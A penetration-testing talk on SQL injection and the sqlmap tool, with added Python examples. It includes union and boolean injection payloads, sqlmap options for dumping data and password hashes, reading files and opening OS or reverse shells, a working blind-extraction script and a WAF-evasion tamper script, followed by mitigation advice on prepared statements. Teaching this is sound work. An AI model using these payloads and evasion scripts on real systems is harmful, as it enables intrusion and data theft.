SQL injection with sqlmap
                          Herman Duarte <hcoduarte@gmail.com>




Tuesday, December 4, 12                                         1
About me

              Consultant @ INTEGRITY S.A. - www.integrity.pt
              Penetration testing engagements
              BSc in Information Systems and Computer Engineering
              CISSP Associate / ISO27001LA / CCNA
              Security addict :)

Roadmap

              SQL injection (SQLi) 101
              sqlmap
              Mitigation techniques
              Wrap-up

SQLi 101: Definition
              Definition:
                    SQL injection occurs when it is possible to inject SQL
                    commands through data-plane input (values the application
                    treats as data) so that they change the execution of the
                    application's predefined SQL statements
              It affects any application that builds dynamic SQL queries from
              unsanitized user-supplied input (e.g. web apps, fat clients)
              Cause:
                    Bad programming practices + lack of knowledge/awareness

SQLi 101: Structure
              ...?name=robert' union all select null,@@version,null #

              Prefix:  the ' after robert, which closes the string literal the input lands in
              Payload: union all select null,@@version,null (three columns, matching name,status,age)
              Suffix:  # (MySQL comment marker; discards the rest of the original query)

              Vulnerable code (PHP):
               $query = "SELECT name,status,age FROM user WHERE name='" . $_REQUEST['name'] . "' AND age > 42";

              Query the DBMS actually executes:
               SELECT name,status,age FROM user WHERE name='robert' union all select null,@@version,null # ' AND age > 42

sqlmap
              Written in Python
              Prerequisites to run sqlmap:
                    Python 2.6.x or 2.7.x (at the time of this talk; current
                    releases also run on Python 3.x)
              To install:
                    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap

              To update (either one):
                    python sqlmap.py --update
                    git pull

sqlmap
              Mainly developed by:




                Bernardo Damele A.G.   Miroslav Stampar
                     (@inquisb)         (@stamparm)

sqlmap: Scenarios

              Find and exploit SQL injection in web applications (the usual
              case: sqlmap sends HTTP requests to the target)


              Direct connection to the DBMS (a database account is needed)
                    The DBMS Python binding must be installed (e.g. PyMySQL)
                    -d <dbms>://<user>:<password>@<ip>:<port>/<db_name>

sqlmap: Workflow
              Select your target
              Identify possible injection points
              Identify SQLi vulnerabilities:
                    By using sqlmap
                    Manual testing :)
              Exploit SQLi vulnerabilities:
                    Enumerate
                    File system access
                    OS pwnage
                    Own the internal network (w00t! w00t!)

sqlmap: Target selection
              -u "<url>" (e.g. https://webapp.com/news.php?id=1)
              -r <request file> (a raw HTTP request saved to a file, e.g. from an
              intercepting proxy; sqlmap takes target, method, headers and cookies from it)
          GET /news.php?id=1&Submit=Submit HTTP/1.1
          Host: webapp.com
          User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-us,en;q=0.5
          Accept-Encoding: gzip, deflate
          Proxy-Connection: keep-alive
          Referer: https://webapp.com/index.php
          Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777;
          DNT: 1

sqlmap: Injection points

              GET parameters
              POST parameters
              Cookie header values (only if --level >= 2)
              User-Agent header value (only if --level >= 3)
              Referer header value (only if --level >= 3)

sqlmap: Finding SQLi (I)
              ./sqlmap.py -u "https://webapp.com/news.php?id=1"
              or
              ./sqlmap.py -r news_get_request --force-ssl
              Default behavior:
                    Tests all GET and/or POST parameters, for all SQLi
                    types, with payloads for all supported DBMSs (unless the
                    back-end DBMS is fingerprinted during the tests)
                    Yes, it may take a long time, and it still doesn't cover all
                    the tests sqlmap can do (see --level and --risk).

sqlmap: Finding SQLi (II)
              --level=<level> (1...5, default is 1)
                    With --level=5 every combination of payload, prefix and suffix
                    is tested on all injection points available, including the
                    Cookie, User-Agent and Referer headers (noisier, but gives
                    more coverage)
              --risk=<risk> (0...3, default is 1)
                    OR-based boolean tests are only enabled with --risk=3. Why?
                    Imagine the injected value lands in an UPDATE:
                    UPDATE user SET disabled=1 WHERE email='email@email.com' OR 1=1#
                    The OR makes the WHERE clause true for every row, so the test
                    disables every user.

              -p <param to test>[,<param to test>] (test only these parameters)

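The UPDATE scenario above, as an added example that is not part of the slides: a "deactivate my account" handler whose e-mail parameter is concatenated into an UPDATE statement, hit with the AND-based test payloads sqlmap sends at any risk level and with the OR-based one it only sends at --risk=3. The table, the statement and the payload strings are constructed for this example against an in-memory SQLite database; SQLite has no MySQL-style `#` comment, so the payloads end with `-- ` instead.

```python
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """Constructed user table: three active accounts (test data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user (email TEXT, disabled INTEGER DEFAULT 0);
        INSERT INTO user (email) VALUES ('alice@example.com');
        INSERT INTO user (email) VALUES ('bob@example.com');
        INSERT INTO user (email) VALUES ('carol@example.com');
    """)
    return conn


def disable_account(conn: sqlite3.Connection, email: str) -> int:
    """Vulnerable 'deactivate account' handler: the e-mail is spliced into the
    WHERE clause unescaped. Returns the number of rows the UPDATE changed."""
    stmt = "UPDATE user SET disabled=1 WHERE email='" + email + "'"
    cur = conn.execute(stmt)
    conn.commit()
    return cur.rowcount


def disabled_after(value: str) -> int:
    """Send one value through the vulnerable handler on a fresh table and
    report how many accounts ended up disabled."""
    conn = fresh_db()
    disable_account(conn, value)
    return conn.execute("SELECT count(*) FROM user WHERE disabled=1").fetchone()[0]


# The two flavours of boolean test payload (constructed). SQLite has no '#'
# comment, so the MySQL '#' from the slide is written as '-- ' here.
AND_TRUE = "alice@example.com' AND 1=1 -- "   # sent from --risk 1 upwards
AND_FALSE = "alice@example.com' AND 1=2 -- "  # sent from --risk 1 upwards
OR_TRUE = "alice@example.com' OR 1=1 -- "     # sent only at --risk 3

if __name__ == "__main__":
    for label, value in [("AND 1=1", AND_TRUE), ("AND 1=2", AND_FALSE), ("OR 1=1", OR_TRUE)]:
        print("%-8s -> %d account(s) disabled" % (label, disabled_after(value)))
```

The AND-based payloads can never match more rows than the original value would have (one account, or none), which is why they are considered low risk; the OR-based payload turns the same statement into "disable everybody".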
sqlmap: SQLi techniques/types
              --technique=SU (default is all of them: BEUST)
              Boolean-based blind (B)
                    The payload turns the original query into a true/false
                    condition; data is inferred char by char from the resulting
                    changes in the page
              Error-based (E)
                    Uses DBMS error messages reflected in the response to
                    extract data
              Union query-based (U)
                    Appends a UNION SELECT to the original query so the extracted
                    data is returned in the page content
              Stacked queries (S)
                    Semicolons are used to append further statements to the
                    original query (the DBMS and the application's database layer
                    must allow multiple statements per call)
              Time-based blind (T)
                    The payload makes the DBMS pause when a condition is true;
                    data is inferred char by char from the response delay

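To make "inferred char by char" concrete, here is an added example (not part of the slides, and not sqlmap's own code) that simulates a boolean-based blind injection against a vulnerable SQLite-backed page and extracts a value one character at a time by binary search, the way sqlmap's boolean-based technique does. The vulnerable `news_page()` function, its tables and the secret they leak are constructed for the example; SQLite's `substr()`/`unicode()` stand in for the MySQL `SUBSTRING()`/`ASCII()` a real payload would use.

```python
import sqlite3

# Constructed stand-in for the target: a news table the page reads from and a
# user table holding the value we will infer. Test data only.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE news (id INTEGER, title TEXT);
    INSERT INTO news VALUES (1, 'Hello world');
    CREATE TABLE user (name TEXT, password TEXT);
    INSERT INTO user VALUES ('admin', 'S3cr3t!');
""")


def news_page(id_param: str) -> str:
    """Vulnerable endpoint (news.php?id=...): the numeric parameter is spliced
    into the query. The attacker sees only the rendered page, so the one bit
    of information available is whether the article is shown or not."""
    query = "SELECT title FROM news WHERE id=" + id_param
    row = conn.execute(query).fetchone()
    return "<h1>%s</h1>" % row[0] if row else "<p>No such article</p>"


# Response for the genuine request; used as the 'TRUE' reference page.
TRUE_PAGE = news_page("1")


def oracle(condition: str) -> bool:
    """Boolean oracle: inject 'id=1 AND (<condition>)' and compare the
    response with the reference page."""
    return news_page("1 AND (%s)" % condition) == TRUE_PAGE


def extract(subquery: str, max_len: int = 64) -> str:
    """Infer the (single-row, single-column) result of `subquery` one character
    at a time. Binary search over 7-bit ASCII costs about 7 requests per
    character instead of up to 128 with a linear scan."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode(substr(x, pos, 1)) is SQLite's spelling of MySQL's
            # ASCII(SUBSTRING(x, pos, 1)).
            if oracle("unicode(substr((%s),%d,1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr() past the end of the string is '' and unicode('') is NULL,
            # so nothing compares greater than 0 here: the string is complete.
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(extract("SELECT password FROM user WHERE name='admin'"))
```

The same loop becomes the time-based blind technique if `oracle()` measures the response delay of a payload such as `... AND IF(<condition>, SLEEP(5), 0)` instead of comparing page content.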
sqlmap: Supported DBMSs
                --dbms=mssql | mysql | postgresql | oracle ...

                  Microsoft SQL Server   SAP MaxDB
                  MySQL                  Sybase
                  PostgreSQL             Firebird
                  Oracle                 SQLite
                  IBM DB2                Microsoft Access

sqlmap: Logging / Verbosity

              Log all HTTP traffic to a text file: -t <output file>
              Save the options used on the command line to a config file: --save <file>
              Verbosity:
                    -v <0..6> (default 1)
                          -v 6 prints the same HTTP traffic as -t, but to the console

sqlmap: Enumeration (I)
              Objective:
                    Get data from the DBMS (limited by the privileges the current
                    DBMS user has)
              What can you get:
                    DBMS exact version, O.S. information, architecture and patch level: -f
                    DBMS banner: -b
                    DBMS server hostname: --hostname
                    DBMS user the application is using: --current-user
                    Application's current DB: --current-db
                    Whether the current user is a DBA: --is-dba

sqlmap: Enumeration (II)
              What can you get:
                    ...
                    List the DBMS users: --users
                    List the DBMS users' password hashes: --passwords
                          sqlmap will offer to crack the hashes with a dictionary
                          attack
                    List users' privileges: --privileges
                    List all available databases: --dbs
                    List all tables, or just those of a specific database:
                          --tables (-D <database name>)

sqlmap: Enumeration (III)
              What can you get:
                    ...
                    List all columns, or just those of a specific table in a database:
                          --columns (-T <table name> -D <db name>)
                    Count table entries: --count
                    Dump data from a database/table/column:
                          --dump (-D, -T, -C can be used to select what data to dump)
                          --dump-all (I don't recommend it)
                    Search for a database, table or column whose name matches a
                    string or part of one:
                          --search (with -D, -T or -C to say what to search for)

sqlmap: Enumeration (IV)
              What can you get:
                    ...
                    Execute a custom SQL query:
                          --sql-query="<sql query to execute>"
                    Interactive SQL shell to execute all your custom SQL queries:
                          --sql-shell

sqlmap: File system access
              Objective:
                    Read and write any textual or binary file on the DBMS server's
                    file system
              Prerequisites:
                    DBMS = mssql | mysql | postgresql
                    Current DBMS user must have the necessary privileges
              Read:
                    --file-read="<file path>"
              Write:
                    --file-write="<file local path>"
                    --file-dest="<remote file location path>"

sqlmap: OS pwnage (I)
              Objective:
                    Get access to the DBMS O.S. and to the internal network (if the
                    DBMS server sits on the internal network)
              Prerequisites:
                    DBMS = mssql | mysql | postgresql
                    Current DBMS user must have the necessary privileges
              What can you do?
                    Get a reverse shell if the DB server can:
                          connect to the internet
                          ping your server (yes, an ICMP shell :))
                    Establish a VNC connection

sqlmap: OS pwnage (II)
              To execute an OS command:
                    --os-cmd="<command to execute>"
              To get an OS shell: --os-shell
              To get a Meterpreter shell, an ICMP shell or VNC (via Metasploit):
                    --os-pwn
                    --msf-path="<msf path>"
              Stored procedure buffer overflow exploitation (Microsoft SQL Server only):
                    --os-bof

sqlmap: Tamper scripts
              Tamper scripts modify the payload before it is sent, to evade WAFs,
              IPSs or keyword filters:
                    --tamper <script file path>[,<script file path>]
              Example, tamper/bluecoat.py (requirement: MySQL behind Blue Coat SGOS
              with WAF activated, as documented in
              https://kb.bluecoat.com/index?page=content&id=FAQ2147). It replaces the
              whitespace after a SQL keyword with a tab and every '=' with LIKE:

                    Input:  SELECT id FROM users where id = 1
                    Output: SELECT%09id FROM users where id LIKE 1

          import re

          def tamper(payload, headers=None):
              # Tab (URL-encoded %09) after SELECT/UPDATE/INSERT/DELETE, and
              # '=' comparisons rewritten as LIKE
              retVal = payload
              if payload:
                  retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
                  retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
              return retVal

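An added example of a complete tamper script, written for this page rather than taken from sqlmap's tamper/ directory: it follows the interface sqlmap expects (a module-level `tamper(payload, **kwargs)` that returns the rewritten payload, plus the `__priority__` constant and `dependencies()` hook found in the shipped scripts) and applies two classic evasions, replacing whitespace with inline comments and randomizing keyword case, while copying string literals through untouched so the injected SQL keeps its meaning. The sample payload is constructed. The script assumes the payload starts outside a string literal (the same assumption sqlmap's own quote tracking makes), so a payload that opens by closing an existing literal, such as `' AND 'a'='a`, would have its `' AND '` read as a literal and left alone.

```python
import random
import re

try:
    from lib.core.enums import PRIORITY     # present when loaded by sqlmap
    __priority__ = PRIORITY.NORMAL
except ImportError:                        # stand-alone run of this example
    __priority__ = 0

# SQL keywords whose case we scramble (case is insignificant to the DBMS).
_KEYWORDS = {"SELECT", "UNION", "ALL", "FROM", "WHERE", "AND", "OR", "NULL",
             "ORDER", "BY", "LIMIT", "LIKE", "INSERT", "UPDATE", "DELETE"}

# Single-quoted string literals; '' inside a literal is an escaped quote.
_LITERAL = re.compile(r"'(?:[^']|'')*'")

_rng = random.Random()


def dependencies():
    """Called once by sqlmap to warn about requirements; nothing to check here."""
    pass


def _scramble(word: str) -> str:
    """Random per-character case, e.g. SELECT -> sElEcT."""
    return "".join(c.upper() if _rng.random() < 0.5 else c.lower() for c in word)


def _rewrite_sql(segment: str) -> str:
    """Transform SQL that is NOT inside a string literal."""
    # Whitespace -> inline comment, except the space after a '--' comment
    # marker: MySQL only treats '--' as a comment when whitespace follows it.
    segment = re.sub(r"(?<!--)\s+", "/**/", segment)
    return re.sub(r"[A-Za-z_]+",
                  lambda m: _scramble(m.group(0)) if m.group(0).upper() in _KEYWORDS else m.group(0),
                  segment)


def tamper(payload, **kwargs):
    """sqlmap tamper entry point: return the payload with whitespace replaced
    by inline comments and keyword case randomized, literals left intact."""
    if not payload:
        return payload
    out, last = [], 0
    for m in _LITERAL.finditer(payload):
        out.append(_rewrite_sql(payload[last:m.start()]))
        out.append(m.group(0))               # literal copied verbatim
        last = m.end()
    out.append(_rewrite_sql(payload[last:]))
    return "".join(out)


def literals(payload: str):
    """The string literals tamper() promises to leave untouched."""
    return _LITERAL.findall(payload)


if __name__ == "__main__":
    # Constructed sample payload
    print(tamper("1 UNION ALL SELECT NULL,'robert smith',NULL -- "))
```

Because the case randomization is deliberately non-deterministic, compare results case-insensitively when testing a script like this; the literal and the `/**/` placement are the parts that must be exact.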
sqlmap



                          DEMO

sqlmap: Tips
              If HTTPS is being used, don't forget to set: --force-ssl
              Gather as much information as you can (DBMS, parameters, application
              behaviour) before starting to look for SQLi vulnerabilities. It will
              save you time.
              Union-based gives more data with fewer requests; use it when available
              Time-based blind SQLi is faster to detect than a union-based injection
              when the original query has many columns (sqlmap has to find the
              right column count before a UNION works)
              If --is-dba returns true and stacked queries work (--technique=S), you
              can start to gangnam style

Mitigation Techniques
              Validate/sanitize input (a defence-in-depth measure, not the fix)
              Use prepared statements / bind variables: the query structure is
              fixed and user input can only ever be data
              Configure DBMS accounts with the least-privilege principle in mind
              (the web app's account should not be a DBA, nor be able to read or
              write files or run OS commands)
              Use generic error messages; never pass DBMS errors to the user
              If the web application source code can't be changed, a proxy
              (database firewall) can be placed between the web server and the
              database server (e.g. GreenSQL)

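The query from the "SQLi 101: Structure" slide, rebuilt as an added example (not code from the slides) against an in-memory SQLite database, illustrates both that slide and the mitigation points above: once spliced together the way the PHP does it, once as a prepared statement with a bind variable, plus a handler that returns a generic error instead of the DBMS message. The table, its two rows and the function names are constructed for this example; since SQLite has no `@@version` and no `#` comment, the union payload uses `sqlite_version()` and `--` instead.

```python
import sqlite3

# Constructed test data standing in for the application's user table.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE user (name TEXT, status TEXT, age INTEGER);
    INSERT INTO user VALUES ('robert', 'active', 45);
    INSERT INTO user VALUES ('alice', 'active', 30);
""")

# Payload from the Structure slide, adapted to SQLite (constructed).
UNION_PAYLOAD = "robert' union all select null,sqlite_version(),null -- "


def search_users_vulnerable(name):
    """Same shape as the slide's PHP: the value is spliced into the SQL text,
    so a quote in it ends the literal and the rest is executed as SQL."""
    query = ("SELECT name,status,age FROM user WHERE name='" + name
             + "' AND age > 42")
    return conn.execute(query).fetchall()


def search_users_prepared(name):
    """Prepared statement: the SQL text is fixed and the value is bound
    separately, so it can never change the statement's structure."""
    query = "SELECT name,status,age FROM user WHERE name=? AND age > 42"
    return conn.execute(query, (name,)).fetchall()


_server_log = []


def log_server_side(exc):
    """Stand-in for the application's server-side logger."""
    _server_log.append(str(exc))


def search_users_handler(name, safe=True):
    """Web-handler style wrapper: DBMS errors are logged server-side and the
    client gets a generic message, so error-based extraction has nothing to
    read from."""
    fn = search_users_prepared if safe else search_users_vulnerable
    try:
        return {"ok": True, "rows": fn(name)}
    except sqlite3.Error as exc:
        log_server_side(exc)
        return {"ok": False, "error": "search failed"}


if __name__ == "__main__":
    print("vulnerable:", search_users_vulnerable(UNION_PAYLOAD))
    print("prepared:  ", search_users_prepared(UNION_PAYLOAD))
    print("handler:   ", search_users_handler("robert'", safe=False))
```

With the concatenated query the payload returns the legitimate row plus a second row carrying the DBMS version, and the trailing `AND age > 42` is commented away; with the bound parameter the whole payload is compared against the name column as an ordinary string and matches nothing.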
Wrap-up

              Input sanitization
              Use prepared statements
              Least-privilege principle is your friend (use it!)
              Have I said to use prepared statements ?! :)
              Do code reviews

References
              https://sqlmap.org
              Advanced SQL injection to operating system full control (Bernardo Damele A. G.) -
              http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857
              SQL Injection Attacks and Defense (Justin Clarke) -
              http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240

Thank You!


                                   Q&A
                 Herman Duarte
                 @hdontwit
                 https://www.linkedin.com/in/hcoduarte
                 hcoduarte@gmail.com